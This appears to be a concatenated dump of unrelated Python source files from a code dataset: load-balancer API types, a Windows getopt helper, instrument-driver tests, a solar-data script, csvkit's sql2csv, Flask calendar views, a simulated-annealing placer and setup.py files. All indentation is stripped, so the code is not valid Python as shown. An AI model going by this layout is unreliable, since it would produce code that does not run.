pool.loadbalancers = []
member_model = types.IdOnlyType
if data_model.health_monitor:
pool.healthmonitor_id = data_model.health_monitor.id
pool.listeners = [
types.IdOnlyType.from_data_model(i) for i in data_model.listeners]
pool.members = [
member_model.from_data_model(i) for i in data_model.members]
pool.tls_versions = data_model.tls_versions
return pool
class PoolFullResponse(PoolResponse):
@classmethod
def _full_response(cls):
return True
members = wtypes.wsattr([member.MemberFullResponse])
healthmonitor = wtypes.wsattr(health_monitor.HealthMonitorFullResponse)
class PoolRootResponse(types.BaseType):
pool = wtypes.wsattr(PoolResponse)
class PoolsRootResponse(types.BaseType):
pools = wtypes.wsattr([PoolResponse])
pools_links = wtypes.wsattr([types.PageType])
class PoolPOST(BasePoolType):
"""Defines mandatory and optional attributes of a POST request."""
name = wtypes.wsattr(wtypes.StringType(max_length=255))
description = wtypes.wsattr(wtypes.StringType(max_length=255))
admin_state_up = wtypes.wsattr(bool, default=True)
listener_id = wtypes.wsattr(wtypes.UuidType())
loadbalancer_id = wtypes.wsattr(wtypes.UuidType())
protocol = wtypes.wsattr(
wtypes.Enum(str, *lib_constants.POOL_SUPPORTED_PROTOCOLS),
mandatory=True)
lb_algorithm = wtypes.wsattr(
wtypes.Enum(str, *constants.SUPPORTED_LB_ALGORITHMS),
mandatory=True)
session_persistence = wtypes.wsattr(SessionPersistencePOST)
# TODO(johnsom) Remove after deprecation (R series)
project_id = wtypes.wsattr(wtypes.StringType(max_length=36))
healthmonitor = wtypes.wsattr(health_monitor.HealthMonitorSingleCreate)
members = wtypes.wsattr([member.MemberSingleCreate])
tags = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType(max_length=255)))
tls_container_ref = wtypes.wsattr(
wtypes.StringType(max_length=255))
ca_tls_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
crl_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
tls_enabled = wtypes.wsattr(bool, default=False)
tls_ciphers = wtypes.wsattr(wtypes.StringType(max_length=2048))
tls_versions = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType(
max_length=32)))
class PoolRootPOST(types.BaseType):
pool = wtypes.wsattr(PoolPOST)
class PoolPUT(BasePoolType):
"""Defines attributes that are acceptable of a PUT request."""
name = wtypes.wsattr(wtypes.StringType(max_length=255))
description = wtypes.wsattr(wtypes.StringType(max_length=255))
admin_state_up = wtypes.wsattr(bool)
lb_algorithm = wtypes.wsattr(
wtypes.Enum(str, *constants.SUPPORTED_LB_ALGORITHMS))
session_persistence = wtypes.wsattr(SessionPersistencePUT)
tags = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType(max_length=255)))
tls_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
ca_tls_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
crl_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
tls_enabled = wtypes.wsattr(bool)
tls_ciphers = wtypes.wsattr(wtypes.StringType(max_length=2048))
tls_versions = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType(
max_length=32)))
class PoolRootPut(types.BaseType):
pool = wtypes.wsattr(PoolPUT)
class PoolSingleCreate(BasePoolType):
"""Defines mandatory and optional attributes of a POST request."""
name = wtypes.wsattr(wtypes.StringType(max_length=255))
description = wtypes.wsattr(wtypes.StringType(max_length=255))
admin_state_up = wtypes.wsattr(bool, default=True)
protocol = wtypes.wsattr(
wtypes.Enum(str, *lib_constants.POOL_SUPPORTED_PROTOCOLS))
lb_algorithm = wtypes.wsattr(
wtypes.Enum(str, *constants.SUPPORTED_LB_ALGORITHMS))
session_persistence = wtypes.wsattr(SessionPersistencePOST)
healthmonitor = wtypes.wsattr(health_monitor.HealthMonitorSingleCreate)
members = wtypes.wsattr([member.MemberSingleCreate])
tags = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType(max_length=255)))
tls_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
ca_tls_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
crl_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
tls_enabled = wtypes.wsattr(bool, default=False)
tls_ciphers = wtypes.wsattr(wtypes.StringType(max_length=2048))
tls_versions = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType(
max_length=32)))
class PoolStatusResponse(BasePoolType):
"""Defines which attributes are to be shown on status response."""
id = wtypes.wsattr(wtypes.UuidType())
name = wtypes.wsattr(wtypes.StringType())
provisioning_status = wtypes.wsattr(wtypes.StringType())
operating_status = wtypes.wsattr(wtypes.StringType())
health_monitor = wtypes.wsattr(
health_monitor.HealthMonitorStatusResponse)
members = wtypes.wsattr([member.MemberStatusResponse])
@classmethod
def from_data_model(cls, data_model, children=False):
pool = super(PoolStatusResponse, cls).from_data_model(
data_model, children=children)
member_model = member.MemberStatusResponse
if data_model.health_monitor:
pool.health_monitor = (
health_monitor.HealthMonitorStatusResponse.from_data_model(
data_model.health_monitor))
pool.members = [
member_model.from_data_model(i) for i in data_model.members]
return pool
|
the-stack_0_6452 | class GetoptError(Exception):
pass
def w_getopt(args, options):
"""A getopt for Windows.
Options may start with either '-' or '/', the option names may
have more than one letter (/tlb or -RegServer), and option names
are case insensitive.
Returns two elements, just as getopt.getopt. The first is a list
of (option, value) pairs in the same way getopt.getopt does, but
there is no '-' or '/' prefix to the option name, and the option
name is always lower case. The second is the list of arguments
which do not belong to an option.
Different from getopt.getopt, a single argument not belonging to an option
does not terminate parsing.
"""
opts = []
arguments = []
while args:
if args[0][:1] in "/-":
arg = args[0][1:] # strip the '-' or '/'
arg = arg.lower()
if arg + ':' in options:
try:
opts.append((arg, args[1]))
except IndexError:
raise GetoptError("option '%s' requires an argument" % args[0])
args = args[1:]
elif arg in options:
opts.append((arg, ''))
else:
raise GetoptError("invalid option '%s'" % args[0])
args = args[1:]
else:
arguments.append(args[0])
args = args[1:]
return opts, arguments
if __debug__:
if __name__ == "__main__":
import unittest
class TestCase(unittest.TestCase):
def test_1(self):
args = "-embedding spam /RegServer foo /UnregSERVER blabla".split()
opts, args = w_getopt(args,
"regserver unregserver embedding".split())
self.assertEqual(opts,
[('embedding', ''),
('regserver', ''),
('unregserver', '')])
self.assertEqual(args, ["spam", "foo", "blabla"])
def test_2(self):
args = "/TLB Hello.Tlb HELLO.idl".split()
opts, args = w_getopt(args, ["tlb:"])
self.assertEqual(opts, [('tlb', 'Hello.Tlb')])
self.assertEqual(args, ['HELLO.idl'])
def test_3(self):
# Invalid option
self.assertRaises(GetoptError, w_getopt,
"/TLIB hello.tlb hello.idl".split(), ["tlb:"])
def test_4(self):
# Missing argument
self.assertRaises(GetoptError, w_getopt,
"/TLB".split(), ["tlb:"])
unittest.main()
|
the-stack_0_6453 | import pytest
import logging
import io
from qcodes.instrument_drivers.stahl import Stahl
import qcodes.instrument.sims as sims
@pytest.fixture(scope="function")
def stahl_instrument():
visa_lib = sims.__file__.replace(
'__init__.py',
'stahl.yaml@sim'
)
inst = Stahl('Stahl', 'ASRL3', visalib=visa_lib)
inst.log.setLevel(logging.DEBUG)
iostream = io.StringIO()
lh = logging.StreamHandler(iostream)
inst.log.logger.addHandler(lh)
try:
yield inst
finally:
inst.close()
def test_parse_idn_string():
"""
Test that we can parse IDN strings correctly
"""
assert Stahl.parse_idn_string("HV123 005 16 b") == {
"model": "HV",
"serial_number": "123",
"voltage_range": 5.0,
"n_channels": 16,
"output_type": "bipolar"
}
with pytest.raises(
RuntimeError,
match="Unexpected instrument response"
):
Stahl.parse_idn_string("HS123 005 16 bla b")
def test_get_idn(stahl_instrument):
"""
Instrument attributes are set correctly after getting the IDN
"""
assert stahl_instrument.IDN() == {
"vendor": "Stahl",
"model": "BS",
"serial": "123",
"firmware": None
}
assert stahl_instrument.n_channels == 16
assert stahl_instrument.voltage_range == 5.0
assert stahl_instrument.output_type == "bipolar"
def test_get_set_voltage(stahl_instrument):
"""
Test that we can correctly get/set voltages
"""
stahl_instrument.channel[0].voltage(1.2)
assert stahl_instrument.channel[0].voltage() == -1.2
logger = stahl_instrument.log.logger
log_messages = logger.handlers[0].stream.getvalue()
assert "did not produce an acknowledge reply" not in log_messages
def test_get_set_voltage_assert_warning(stahl_instrument):
"""
On channel 2 we have deliberately introduced an error in the
visa simulation; setting a voltage does not produce an acknowledge
string. Test that a warning is correctly issued.
"""
stahl_instrument.channel[1].voltage(1.0)
logger = stahl_instrument.log.logger
log_messages = logger.handlers[0].stream.getvalue()
assert "did not produce an acknowledge reply" in log_messages
def test_get_current(stahl_instrument):
"""
Test that we can read currents and that the unit is in Ampere
"""
assert stahl_instrument.channel[0].current() == 1E-6
assert stahl_instrument.channel[0].current.unit == "A"
def test_get_temperature(stahl_instrument):
"""
Due to limitations in pyvisa-sim, we cannot test this.
Line 191 of pyvisa-sim/component.py should read
"return response.encode('latin-1')" for this to work.
"""
pass
|
the-stack_0_6454 | # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
"""
BLIS - Balancing Load of Intermittent Solar:
A characteristic-based transient power plant model
Copyright (C) 2020. University of Virginia Licensing & Ventures Group (UVA LVG). All Rights Reserved.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
import pandas as pd
# Data-file details
filename = "PVLibSolarData.csv"
timezone_original = 'UTC'
timezone_new = 'US/Eastern'
# Version details
range1 = ['2017-07-01', '2017-07-31']
range1_name = 'July'
range2 = ['2017-10-30', '2017-10-30']
range2_name = 'Oct30th'
# -----
# Read-in data file
# -----
df = pd.read_csv(filename)
# -----
# Convert timezone
# -----
df.index = pd.to_datetime(df.loc[:, 'DatetimeUTC'])
df.index = df.index.tz_localize(timezone_original)
df.index = df.index.tz_convert(timezone_new)
# -----
# Initial Calculations
# -----
df_out = pd.DataFrame(columns=['dt', 'hour', 'demand', 'solar'])
df_out.index.name = 'Datetime'
df_out['dt'] = df.loc[:, 'dt']
df_out['hour'] = df.index.hour
df_out['demand'] = df.loc[:, 'demand']
for i in range(2):
# -----
# Case specific calculations
# -----
if i == 0:
# Case 1 - 1% solar
case = 'data001'
df_out['solar'] = df.loc[:, 'UVA_Rooftop']
else:
# Case 2 - 63% solar
case = 'data063'
df_out['solar'] = df.loc[:, 'Rooftop_and_32MWTracker']
# A - Entire Timeperiod
savename = case + '.csv'
df_out.to_csv(savename, index=False)
# B - Range1
savename = case + '_' + range1_name + '.csv'
df_out[range1[0]:range1[1]].to_csv(savename, index=True)
# C - Range2
savename = case + '_' + range2_name + '.csv'
df_out[range2[0]:range2[1]].to_csv(savename, index=True)
|
the-stack_0_6455 | #!/usr/bin/env python
from argparse import FileType
import sys
import agate
from sqlalchemy import create_engine
from csvkit.cli import CSVKitUtility
class SQL2CSV(CSVKitUtility):
description = 'Execute an SQL query on a database and output the result to a CSV file.'
override_flags = 'f,b,d,e,H,p,q,S,t,u,z,zero'.split(',')
def add_arguments(self):
self.argparser.add_argument('--db', dest='connection_string', default='sqlite://',
help='An sqlalchemy connection string to connect to a database.',)
self.argparser.add_argument('file', metavar="FILE", nargs='?', type=FileType('rt'), default=sys.stdin,
help='The file to use as SQL query. If both FILE and QUERY are omitted, query will be read from STDIN.')
self.argparser.add_argument('--query', default=None,
help="The SQL query to execute. If specified, it overrides FILE and STDIN.")
self.argparser.add_argument('-H', '--no-header-row', dest='no_header_row', action='store_true',
help='Do not output column names.')
self.argparser.set_defaults(
delimiter=None,
doublequote=None,
escapechar=None,
encoding='utf-8',
field_size_limit=None,
quotechar=None,
quoting=None,
skipinitialspace=None,
tabs=None,
)
def main(self):
try:
engine = create_engine(self.args.connection_string)
except ImportError:
raise ImportError('You don\'t appear to have the necessary database backend installed for connection string you\'re trying to use. Available backends include:\n\nPostgresql:\tpip install psycopg2\nMySQL:\t\tpip install MySQL-python\n\nFor details on connection strings and other backends, please see the SQLAlchemy documentation on dialects at: \n\nhttp://www.sqlalchemy.org/docs/dialects/\n\n')
connection = engine.connect()
if self.args.query:
query = self.args.query.strip()
else:
query = ""
for line in self.args.file:
query += line
# Must escape '%'.
# @see https://github.com/wireservice/csvkit/issues/440
# @see https://bitbucket.org/zzzeek/sqlalchemy/commits/5bc1f17cb53248e7cea609693a3b2a9bb702545b
rows = connection.execute(query.replace('%', '%%'))
output = agate.csv.writer(self.output_file, **self.writer_kwargs)
if rows.returns_rows:
if not self.args.no_header_row:
output.writerow(rows._metadata.keys)
for row in rows:
output.writerow(row)
connection.close()
def launch_new_instance():
utility = SQL2CSV()
utility.run()
if __name__ == '__main__':
launch_new_instance()
|
the-stack_0_6457 | import re
from typing import Optional, cast # noqa: F401
import flask_app.constants as constants
from flask import abort, current_app, g, jsonify, make_response, redirect, render_template, request
from flask_app.app_utils import (
add_session,
authenticated,
authorized,
get_session_username,
new_session_id,
next_month_link,
previous_month_link,
)
from flask_app.authentication import Authentication
from flask_app.calendar_data import CalendarData
from flask_app.gregorian_calendar import GregorianCalendar
from werkzeug.wrappers import Response
def get_authentication() -> Authentication:
auth = getattr(g, "_auth", None)
if auth is None:
auth = g._auth = Authentication(
data_folder=current_app.config["USERS_DATA_FOLDER"],
password_salt=current_app.config["PASSWORD_SALT"],
failed_login_delay_base=current_app.config["FAILED_LOGIN_DELAY_BASE"],
)
return cast(Authentication, auth)
@authenticated
def index_action() -> Response:
username = get_session_username(session_id=str(request.cookies.get(constants.SESSION_ID)))
authentication = get_authentication()
user_data = authentication.user_data(username)
return redirect("/{}/".format(user_data["default_calendar"]))
def login_action() -> Response:
return cast(Response, render_template("login.html"))
def do_login_action() -> Response:
username = request.form.get("username", "")
password = request.form.get("password", "")
authentication = get_authentication()
if authentication.is_valid(username, password):
session_id = new_session_id()
add_session(session_id, username)
response = make_response(redirect("/"))
cookie_kwargs = {
"key": constants.SESSION_ID,
"value": session_id,
# 1 month
"max_age": 2678400,
"secure": current_app.config["COOKIE_HTTPS_ONLY"],
"httponly": True,
}
samesite_policy = current_app.config.get("COOKIE_SAMESITE_POLICY", None)
# Certain Flask versions don't support 'samesite' param
if samesite_policy:
cookie_kwargs.update({"samesite": samesite_policy})
response.set_cookie(**cookie_kwargs)
return cast(Response, response)
else:
return redirect("/login")
@authenticated
@authorized
def main_calendar_action(calendar_id: str) -> Response:
GregorianCalendar.setfirstweekday(current_app.config["WEEK_STARTING_DAY"])
current_day, current_month, current_year = GregorianCalendar.current_date()
year = int(request.args.get("y", current_year))
year = max(min(year, current_app.config["MAX_YEAR"]), current_app.config["MIN_YEAR"])
month = int(request.args.get("m", current_month))
month = max(min(month, 12), 1)
month_name = GregorianCalendar.MONTH_NAMES[month - 1]
if current_app.config["HIDE_PAST_TASKS"]:
view_past_tasks = False
else:
view_past_tasks = request.cookies.get("ViewPastTasks", "1") == "1"
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
try:
data = calendar_data.load_calendar(calendar_id)
except FileNotFoundError:
abort(404)
tasks = calendar_data.tasks_from_calendar(year, month, data)
tasks = calendar_data.add_repetitive_tasks_from_calendar(year, month, data, tasks)
if not view_past_tasks:
calendar_data.hide_past_tasks(year, month, tasks)
if current_app.config["WEEK_STARTING_DAY"] == constants.WEEK_START_DAY_MONDAY:
weekdays_headers = ["MON", "TUE", "WED", "THU", "FRI", "SAT", "SUN"]
else:
weekdays_headers = ["SUN", "MON", "TUE", "WED", "THU", "FRI", "SAT"]
return cast(
Response,
render_template(
"calendar.html",
calendar_id=calendar_id,
year=year,
month=month,
month_name=month_name,
current_year=current_year,
current_month=current_month,
current_day=current_day,
month_days=GregorianCalendar.month_days(year, month),
previous_month_link=previous_month_link(year, month),
next_month_link=next_month_link(year, month),
base_url=current_app.config["BASE_URL"],
tasks=tasks,
display_view_past_button=current_app.config["SHOW_VIEW_PAST_BUTTON"],
weekdays_headers=weekdays_headers,
),
)
@authenticated
@authorized
def new_task_action(calendar_id: str, year: int, month: int) -> Response:
GregorianCalendar.setfirstweekday(current_app.config["WEEK_STARTING_DAY"])
current_day, current_month, current_year = GregorianCalendar.current_date()
year = max(min(int(year), current_app.config["MAX_YEAR"]), current_app.config["MIN_YEAR"])
month = max(min(int(month), 12), 1)
month_names = GregorianCalendar.MONTH_NAMES
if current_month == month and current_year == year:
day = current_day
else:
day = 1
day = int(request.args.get("day", day))
task = {
"date": CalendarData.date_for_frontend(year, month, day),
"is_all_day": True,
"repeats": False,
"details": "",
}
emojis_enabled = current_app.config.get("EMOJIS_ENABLED", False)
return cast(
Response,
render_template(
"task.html",
calendar_id=calendar_id,
year=year,
month=month,
min_year=current_app.config["MIN_YEAR"],
max_year=current_app.config["MAX_YEAR"],
month_names=month_names,
task=task,
base_url=current_app.config["BASE_URL"],
editing=False,
emojis_enabled=emojis_enabled,
button_default_color_value=current_app.config["BUTTON_CUSTOM_COLOR_VALUE"],
buttons_colors=current_app.config["BUTTONS_COLORS_LIST"],
buttons_emojis=current_app.config["BUTTONS_EMOJIS_LIST"] if emojis_enabled else tuple(),
),
)
@authenticated
@authorized
def edit_task_action(calendar_id: str, year: int, month: int, day: int, task_id: int) -> Response:
month_names = GregorianCalendar.MONTH_NAMES
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
repeats = request.args.get("repeats") == "1"
try:
if repeats:
task = calendar_data.repetitive_task_from_calendar(
calendar_id=calendar_id, year=year, month=month, task_id=int(task_id)
)
else:
task = calendar_data.task_from_calendar(
calendar_id=calendar_id, year=year, month=month, day=day, task_id=int(task_id),
)
except (FileNotFoundError, IndexError):
abort(404)
if task["details"] == " ":
task["details"] = ""
emojis_enabled = current_app.config.get("EMOJIS_ENABLED", False)
return cast(
Response,
render_template(
"task.html",
calendar_id=calendar_id,
year=year,
month=month,
day=day,
min_year=current_app.config["MIN_YEAR"],
max_year=current_app.config["MAX_YEAR"],
month_names=month_names,
task=task,
base_url=current_app.config["BASE_URL"],
editing=True,
emojis_enabled=emojis_enabled,
button_default_color_value=current_app.config["BUTTON_CUSTOM_COLOR_VALUE"],
buttons_colors=current_app.config["BUTTONS_COLORS_LIST"],
buttons_emojis=current_app.config["BUTTONS_EMOJIS_LIST"] if emojis_enabled else tuple(),
),
)
@authenticated
@authorized
def update_task_action(calendar_id: str, year: str, month: str, day: str, task_id: str) -> Response:
# Logic is same as save + delete, could refactor but can wait until need to change any save/delete logic
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
# For creation of "updated" task use only form data
title = request.form["title"].strip()
date = request.form.get("date", "")
if len(date) > 0:
fragments = re.split("-", date)
updated_year = int(fragments[0]) # type: Optional[int]
updated_month = int(fragments[1]) # type: Optional[int]
updated_day = int(fragments[2]) # type: Optional[int]
else:
updated_year = updated_month = updated_day = None
is_all_day = request.form.get("is_all_day", "0") == "1"
start_time = request.form["start_time"]
end_time = request.form.get("end_time", None)
details = request.form["details"].replace("\r", "").replace("\n", "<br>")
color = request.form["color"]
has_repetition = request.form.get("repeats", "0") == "1"
repetition_type = request.form.get("repetition_type", "")
repetition_subtype = request.form.get("repetition_subtype", "")
repetition_value = int(request.form["repetition_value"]) # type: int
calendar_data.create_task(
calendar_id=calendar_id,
year=updated_year,
month=updated_month,
day=updated_day,
title=title,
is_all_day=is_all_day,
start_time=start_time,
end_time=end_time,
details=details,
color=color,
has_repetition=has_repetition,
repetition_type=repetition_type,
repetition_subtype=repetition_subtype,
repetition_value=repetition_value,
)
# For deletion of old task data use only url data
calendar_data.delete_task(
calendar_id=calendar_id, year_str=year, month_str=month, day_str=day, task_id=int(task_id),
)
if updated_year is None:
return redirect("{}/{}/".format(current_app.config["BASE_URL"], calendar_id), code=302)
else:
return redirect(
"{}/{}/?y={}&m={}".format(current_app.config["BASE_URL"], calendar_id, updated_year, updated_month),
code=302,
)
@authenticated
@authorized
def save_task_action(calendar_id: str) -> Response:
title = request.form["title"].strip()
date = request.form.get("date", "")
if len(date) > 0:
date_fragments = re.split("-", date)
year = int(date_fragments[0]) # type: Optional[int]
month = int(date_fragments[1]) # type: Optional[int]
day = int(date_fragments[2]) # type: Optional[int]
else:
year = month = day = None
is_all_day = request.form.get("is_all_day", "0") == "1"
start_time = request.form["start_time"]
end_time = request.form.get("end_time", None)
details = request.form["details"].replace("\r", "").replace("\n", "<br>")
color = request.form["color"]
has_repetition = request.form.get("repeats", "0") == "1"
repetition_type = request.form.get("repetition_type")
repetition_subtype = request.form.get("repetition_subtype")
repetition_value = int(request.form["repetition_value"])
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
calendar_data.create_task(
calendar_id=calendar_id,
year=year,
month=month,
day=day,
title=title,
is_all_day=is_all_day,
start_time=start_time,
end_time=end_time,
details=details,
color=color,
has_repetition=has_repetition,
repetition_type=repetition_type,
repetition_subtype=repetition_subtype,
repetition_value=repetition_value,
)
if year is None:
return redirect("{}/{}/".format(current_app.config["BASE_URL"], calendar_id), code=302)
else:
return redirect("{}/{}/?y={}&m={}".format(current_app.config["BASE_URL"], calendar_id, year, month), code=302,)
@authenticated
@authorized
def delete_task_action(calendar_id: str, year: str, month: str, day: str, task_id: str) -> Response:
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
calendar_data.delete_task(
calendar_id=calendar_id, year_str=year, month_str=month, day_str=day, task_id=int(task_id),
)
return cast(Response, jsonify({}))
@authenticated
@authorized
def update_task_day_action(calendar_id: str, year: str, month: str, day: str, task_id: str) -> Response:
new_day = request.data.decode("utf-8")
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
calendar_data.update_task_day(
calendar_id=calendar_id, year_str=year, month_str=month, day_str=day, task_id=int(task_id), new_day_str=new_day,
)
return cast(Response, jsonify({}))
@authenticated
@authorized
def hide_repetition_task_instance_action(calendar_id: str, year: str, month: str, day: str, task_id: str) -> Response:
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
calendar_data.hide_repetition_task_instance(
calendar_id=calendar_id, year_str=year, month_str=month, day_str=day, task_id_str=task_id,
)
return cast(Response, jsonify({}))
def open_calc_plots_action() -> Response:
# username = get_session_username(session_id=str(request.cookies.get(constants.SESSION_ID)))
# authentication = get_authentication()
# user_data = authentication.user_data(username)
# return cast(Response, render_template("../Calculator/index.html"))
# return cast(
# Response,
# render_template(
# "../Calculator/index.html"
# ))
return render_template("index.html")
|
the-stack_0_6458 | from __future__ import absolute_import, unicode_literals
from django import forms
from django.forms.models import inlineformset_factory
from django.utils.translation import ugettext_lazy as _
from tuiuiu.contrib.searchpromotions.models import SearchPromotion
from tuiuiu.tuiuiuadmin.widgets import AdminPageChooser
from tuiuiu.tuiuiusearch.models import Query
class SearchPromotionForm(forms.ModelForm):
sort_order = forms.IntegerField(required=False)
def __init__(self, *args, **kwargs):
super(SearchPromotionForm, self).__init__(*args, **kwargs)
self.fields['page'].widget = AdminPageChooser()
class Meta:
model = SearchPromotion
fields = ('query', 'page', 'description')
widgets = {
'description': forms.Textarea(attrs=dict(rows=3)),
}
SearchPromotionsFormSetBase = inlineformset_factory(
Query, SearchPromotion, form=SearchPromotionForm, can_order=True, can_delete=True, extra=0
)
class SearchPromotionsFormSet(SearchPromotionsFormSetBase):
minimum_forms = 1
minimum_forms_message = _("Please specify at least one recommendation for this search term.")
def add_fields(self, form, *args, **kwargs):
super(SearchPromotionsFormSet, self).add_fields(form, *args, **kwargs)
# Hide delete and order fields
form.fields['DELETE'].widget = forms.HiddenInput()
form.fields['ORDER'].widget = forms.HiddenInput()
# Remove query field
del form.fields['query']
def clean(self):
# Search pick must have at least one recommended page to be valid
# Check there is at least one non-deleted form.
non_deleted_forms = self.total_form_count()
non_empty_forms = 0
for i in range(0, self.total_form_count()):
form = self.forms[i]
if self.can_delete and self._should_delete_form(form):
non_deleted_forms -= 1
if not (form.instance.id is None and not form.has_changed()):
non_empty_forms += 1
if (
non_deleted_forms < self.minimum_forms or
non_empty_forms < self.minimum_forms
):
raise forms.ValidationError(self.minimum_forms_message)
|
the-stack_0_6459 | from tensorflow.python.client import device_lib
# 测试tensorflow安装成功与否
import tensorflow as tf
import numpy as np
import math
print(tf.test.is_gpu_available())
def get_available_gpus():
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU']
print(get_available_gpus())
'''
softmax 交叉熵公式验证 -sum(yi*ln(ai)) yi为样本i的真实标签=1 ai=(softmax(yi_hat)[max(yi)]) 即取yi对应下标的值
'''
def softmax(x):
sum_raw = np.sum(np.exp(x), axis=-1)
x1 = np.ones(np.shape(x))
for i in range(np.shape(x)[0]):
x1[i] = np.exp(x[i]) / sum_raw[i]
return x1
def get_loss(y:np.array([[]]),y_hat:np.array([[]])):
res=0.
mat_val=softmax(y_hat)
print('mat_val:',mat_val)
# sum所有元素求和
res=np.sum(y*np.log(mat_val))
return res
# y=np.array([[0,1,0],[0,1,0]])
# y_hat=np.array([[0.9,0.1,1],[0.2,0.8,2]])
# print(np.argmax(y,axis=1))
# print(get_loss(y,y_hat))
# loss=tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=y_hat))
import matplotlib.pyplot as plt
x=[]
x2=[]
x3=[]
y=[]
for i in range(1000):
x.append(np.floor(np.random.normal(8400,200)))
x2.append(np.floor(np.random.uniform(6800,8400)))
x3.append(np.floor(np.random.poisson(8400)))
plt.plot(x,y)
plt.show()
plt.plot(x2)
plt.show()
plt.plot(x3)
plt.show()
def printX(x):
x=np.array(x)
print(np.max(x), np.min(x), np.mean(x), np.std(x))
printX(x)
printX(x2)
printX(x3)
# with tf.Session() as sess:
# loss_val=sess.run(loss)
# print(loss_val) |
the-stack_0_6460 | import random
import math
import copy
from prj4_data import *
def GetRandomVacancy(L):
x = random.randint(0, L.xlim-1)
y = random.randint(0, L.ylim-1)
while L.layout[x][y] != None:
x = random.randint(0, L.xlim-1)
y = random.randint(0, L.ylim-1)
return x, y
def RandomPlacement(L):
for k,v in L.AllCells.items():
x, y = GetRandomVacancy(L)
L.layout[x][y] = k
v.loc = [x, y]
def SimulatedAnnealing(L, Tstart, Tend, iterPerT):
T = Tstart
alpha = 0.95
iterEst = math.log(Tend/Tstart, 0.85) # 对总退火周期的估计
print('estimated annealing iterations:', iterEst * iterPerT)
iOuterLoop = 0
while T > Tend:
cost = [L.getCost()]
accepted = list()
# 退火过程
for iInnerLoop in range(iterPerT):
flag = random.randint(0, 1)
Lnew = copy.deepcopy(L)
# 移动
if flag:
tIndex = random.choice(list(Lnew.AllCells.keys()))
Lnew.move(tIndex, GetRandomVacancy(Lnew))
# 交换
else:
t1Index = random.choice(list(Lnew.AllCells.keys()))
t2Index = random.choice(list(Lnew.AllCells.keys()))
while t2Index == t1Index:
t2Index = random.choice(list(Lnew.AllCells.keys()))
Lnew.swap(t1Index, t2Index)
cost.append(Lnew.getCost())
delta = cost[-1] - cost[-2]
if random.random() < math.exp(-delta/T):
L = Lnew
accepted.append(True)
else:
cost[-1] = cost[-2]
accepted.append(False)
print('temperature:', T)
print('cost:', cost[1:])
print('accepted:', accepted)
# 降低温度
if iOuterLoop < iterEst * 0.25:
alpha -= (0.95 - 0.8) / (iterEst / 4)
elif iOuterLoop > iterEst * 0.75:
alpha += (0.95 - 0.8) / (iterEst / 4)
if alpha < 0.8:
alpha = 0.8
elif alpha > 0.95:
alpha = 0.95
T *= alpha
iOuterLoop += 1
return L
|
the-stack_0_6461 | #!/usr/bin/env python
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import os
import platform
import subprocess
import sys
import setuptools
from setuptools import find_packages, setup
from setuptools.command.install import install
from setuptools.command.test import test
# When executing the setup.py, we need to be able to import ourselves, this
# means that we need to add the src/ directory to the sys.path.
base_dir = os.path.dirname(__file__)
src_dir = os.path.join(base_dir, "src")
sys.path.insert(0, src_dir)
about = {}
with open(os.path.join(src_dir, "activeledgersdk", "__about__.py")) as f:
exec(f.read(), about)
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name=about["__title__"],
version=about["__version__"],
description=about["__summary__"],
long_description=long_description,
license=about["__license__"],
url=about["__uri__"],
author=about["__author__"],
author_email=about["__email__"],
package_dir={"": "src"},
packages=find_packages(where="src"),
include_package_data=True
)
|
the-stack_0_6462 | import distutils
import os.path
from setuptools import setup
from setuptools.command.install import install as _install
PTH = (
'try:\n'
' import future_annotations\n'
'except ImportError:\n'
' pass\n'
'else:\n'
' future_annotations.register()\n'
)
class install(_install):
def initialize_options(self):
